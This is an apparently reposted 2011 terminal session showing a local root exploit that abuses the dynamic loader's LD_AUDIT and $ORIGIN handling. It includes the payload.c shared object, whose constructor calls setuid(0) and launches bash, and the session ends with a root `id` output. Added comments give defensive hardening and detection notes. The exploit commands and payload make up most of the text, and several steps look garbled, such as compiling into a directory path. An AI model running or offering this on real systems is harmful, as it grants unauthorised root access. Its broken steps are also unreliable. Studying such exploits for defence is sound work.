2011-06-01 15:49:25
# Terminal session as posted: the prompt starts as the unprivileged account
# "aaaa" ($) and ends as root (#, uid=0). The steps combine LD_AUDIT (the
# dynamic loader's audit-library variable), the loader token $ORIGIN (the
# directory holding the executable) and a shared object built from payload.c.
# NOTE(review): reproduced exactly as posted. The listing looks abridged and the
# page cites no advisory or affected C-library version; confirm both against
# the distribution's security notices before drawing conclusions from it.
#
# Defensive reading:
#  - Risk: presumably the loader honoured LD_AUDIT/$ORIGIN for a program that
#    runs with elevated privileges; loaders are expected to ignore or tightly
#    restrict such variables in that mode, so the C-library patch level is the
#    primary control.
#  - Hardening: keep world-writable directories such as /tmp on their own
#    filesystem mounted nosuid (and noexec where workable), and keep the set
#    of set-uid binaries small.
#  - Detection: alert on shared objects compiled or dropped into
#    world-writable directories, and on a root shell whose login (audit) uid
#    belongs to an unprivileged user.
[aaaa@demon ~]$ mkdir /tmp/a
[aaaa@demon~]$ ln -s /bin/ls /tmp/a/b
[aaaa@demon ~]$ exec 3< /tmp/a/b
[aaaa@demon ~]$ gcc -w -fPIC -shared -o /tmp/a payload.c
[aaaa@demon ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3 payload.c
[root@demon ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# Contents of payload.c follow. The function carries the GCC constructor
# attribute, so it runs when the shared object is loaded; it calls setuid(0)
# and then starts /bin/bash. -w in the gcc line above silences the warnings
# caused by the missing headers.
payload.c内容如下
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}